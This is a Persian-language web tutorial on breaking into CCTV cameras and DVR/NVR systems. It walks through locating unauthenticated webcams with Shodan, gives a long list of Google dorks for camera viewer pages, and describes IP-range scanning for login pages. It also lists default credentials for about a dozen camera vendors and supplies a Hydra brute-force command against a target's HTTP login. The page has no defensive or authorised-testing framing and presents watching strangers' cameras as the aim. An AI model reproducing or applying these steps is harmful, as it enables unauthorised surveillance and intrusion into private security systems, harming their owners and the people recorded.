امروزه دوربین مداربسته به یک سیستم امنیتی مهم تبدیل شده است که در اکثر مکان ها مانند مغازه ها، مراکز، دفاتر، انبار و غیره استفاده می شود.در این آموزش با روش های نفوذ به دوربین های مداربسته آشنا خواهید شد.
اگر بخواهیم روش های نفوذ به دوربین های مداربسته را به ترتیب بیان کنیم، یک لیست به صورت زیر خواهیم داشت:
در روش اول ما از طریق چند روش میتوانیم دوربین های مورد نظر خود را پیدا کنیم. به عنوان مثال : استفاده ازموتور جستجوی شودان یا استفاده از گوگل و…
به منظور شروع جستجو در وب سایت شودان ابتدا به آدرس shodan.io رفته و به حساب کاربری خود درشودان لاگین کنید.
راه های زیادی به منظور جستجوی دوربین ها درون شودان وجود دارد. به عنوان نمونه جستجو بر اساس نام سازنده وبکم شروع خوبی است. به یاد داشته باشید که شودان اطلاعات بنر سازنده ها را ذخیره می کند و جستجو را بر این اساس انجام می دهد نه محتوای آنها. یکی از سازنده های معروف که نتایج خوبی را به همراه دارد، webcamxp می باشد که صدها نتیجه را به همراه خواهد داشت. به این منظور کلمه کلیدی webcamxp را درون نوار جستجو وارد کنید. همانطور که مشاهده می کنید نتایج زیادی را به همراه دارد.
تمام این وبکم ها به دلیل عدم وجود احرازهویت توسط شما قابل مشاهده هستند. و ما میتوانیم با باز کردن ایپی ادرس انها در مرورگر خود، بدون نیاز به احراز هویت دوربین ها را تماشا کنیم.
هک دوربین ها مدار بسته با شودان
همچنین میتوانیم از گوگل برای پیدا کردن این گونه دوربین ها استفاده کنیم که در این حالت نیاز به دورک های خاص داریم. به عنوان مثال من چند مورد از این دورک ها رو برای شما میزارم:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | inurl:”CgiStart?page=” inurl:/view.shtml intitle:”Live View / – AXIS inurl:view/view.shtml inurl:ViewerFrame?Mode= inurl:ViewerFrame?Mode=Refresh inurl:axis-cgi/jpg inurl:axis-cgi/mjpg (motion-JPEG) (disconnected) inurl:view/indexFrame.shtml inurl:view/index.shtml inurl:view/view.shtml liveapplet intitle:”live view” intitle:axis intitle:liveapplet allintitle:”Network Camera NetworkCamera” (disconnected) intitle:axis intitle:”video server” intitle:liveapplet inurl:LvAppl intitle:”EvoCam” inurl:”webcam.html” intitle:”Live NetSnap Cam-Server feed” intitle:”Live View / – AXIS” intitle:”Live View / – AXIS 206M” intitle:”Live View / – AXIS 206W” intitle:”Live View / – AXIS 210? inurl:indexFrame.shtml Axis inurl:”MultiCameraFrame?Mode=Motion” (disconnected) intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page” intitle:snc-z20 inurl:home/ intitle:snc-cs3 inurl:home/ intitle:snc-rz30 inurl:home/ intitle:”sony network camera snc-p1? intitle:”sony network camera snc-m1? site:.viewnetcam.com -www.viewnetcam.com intitle:”Toshiba Network Camera” user login intitle:”netcam live image” (disconnected) intitle:”i-Catcher Console – Web Monitor” |
یکی از رایج ترین روش های نفوذ به دوربین های مدار بسته، روش پیدا کردن پسورد است. تمامی دوربین های مداربسته به یک دستگاه DVR/NVR که وظیفه کنترل و مدیریت دوربین ها را دارد متصل میشوند و این دستگاه نیز از طریق کابل شبکه به اینترنت متصل میشود. دستگاه DVR/NVR بعد از متصل شدن به اینترنت یک ایپی استاتیک دریافت میکند که یک هکر با داشتن آن ip و یوزرنیم و پسورد متعلق به آن، میتواند در هر جای دنیا که باشد از طریق اینترنت به دوربین ها دسترسی پیدا کند.
حال ۲ سناریو به وجود می آید:
برای سناریو اول نیز میتوانیم از چند روش استفاده بکنیم که بهترین آنها استفاده از موتورهای جستجو یا اسکن رنج ایپی های متفاوت است.
در روش موتورهای جستجو، همانند روشی عمل میکنیم که در دوربین های پیکربندی نشده به ان اشاره کردیم.
در روش اسکن رنج ایپی های متفاوت نیز میتوانیم به صورت زیر عمل کنیم:
بعد از دانلود و نصب برنامه به سراغ انتخاب رنج ایپی مناسب برای دوربین های مدار بسته میرویم که من پیشنهاد میکنم از رنج ایپی خود برای این کار استفاده کنید. برای این کار کافی است تا عبارت my ip” را در گوگل سرچ کنید.
در مرحله بعد پورت های مهم را در برنامه تنظیم میکنیم:
همچنین در قسمت Fetchers نیز گزینه web detect را مانند تصویر زیر انتخاب میکنیم:
حالا کافی است تا رنج خود را در برنامه تنظیم کرده و اسکن را شروع کنیم:
بعد از باز کردن ایپی مورد نظر در مرورگر خود به صفحه لاگین دوربین میرسیم که مهم ترین قسمت کار به شمار میرود. و سناریو دوم ما به حساب می اید:برای پیدا کردن پسورد چندین راه وجود دارد که مهم ترین انها میتواند: شکستن پسود یا استفاده از پسورد های پیشفرض باشد.
اولین گام به منظور عبور از این سیستم ها امتحان کردن نام کاربری و رمزعبورهای پیش فرض موجود این وبکم ها می باشد . برخی از اعتبارنامه های پیش فرض این وبکم ها به شرح زیر می باشد:
1 2 3 4 5 6 7 8 9 10 11 12 13 | ACTi : admin/123456 , Admin/123456 Axis (Old) : root/pass Grandstream: admin/admin IQinVision: root/system Mobotix: admin/meinsm Panasonic: admin/12345 Samsung Electronics: root/root , admin/4321 Samsung Techwin :admin/4321 , admin/1111111 Sony: admin/admin TRENDnet: admin/admin Toshiba: root/ikwd Vivotek : root,empty WebcamXP: admin/empty |
در روش شکستن پسورد هم میتوانیم از ابزارهای موجود برای کرک کردن استفاده کنیم که یکی از این ابزارها، Hydra میباشد. این ابزار به صورت پیشفرض در سیستم عامل کالی لینوکس موجود میباشد که با استفاده از دستور زیر در محیط ترمینال میتوانیم از ان استفاده کنیم:
1 | root@kaliboys:~# hydra -s 80 -l admin -P /root/Desktop/wl/cctvpass.txt -e ns -t 16 targetIP http |
آرگومان های استفاده شده در این دستور:
۳ روش باقیمانده دیگر نیز براساس نام انها قابل درک است و نیازی به توضیح ندارند. ولی میتوان گفت که سخت ترین روش ها میباشند. چون برای مثال یک شرکت سازنده دستگاه dvr، هیچ موقع باگی برای نفوذ باقی نمیگذارد تا با استفاده از ان نفوذگر بتواند به سیستم عبور کند. ولی امنیت هیچ موقع ۱۰۰ درصد نبوده و نخواهد بود پس احتما هک شدن سیستم با این روش نیز امکان دارد.
درباره این سایت